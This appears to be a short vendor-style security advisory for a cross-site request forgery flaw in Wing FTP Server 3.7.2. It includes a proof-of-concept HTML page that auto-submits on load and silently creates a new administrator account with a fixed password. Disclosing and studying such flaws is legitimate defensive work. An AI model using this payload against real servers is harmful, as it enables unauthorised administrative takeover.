Home
Consulting
Advisories
Software
Articles
Contact

Wing FTP Server 3.7.2 Cross-site Request Forgery

Legacy Advisories

Description

A cross-site request forgery vulnerability in Wing FTP Server 3.7.2 can be exploited to create a new admin.

Proof Of Concept

<html>
    <body onload="document.forms[0].submit()">
        <form method="POST" action="http://hackbox:5466/admin_addadmin.html">
            <input type="hidden" name="admin" value="{"username":"new_admin","password":"Password1","oldpassword":"","readonly":0,"domainadmin":0,"domainlist":"","mydirectory":"","ipmasks":[]}" />
        </form>
    </body>
</html>


Copyright © 2018 AutoSec Tools LLC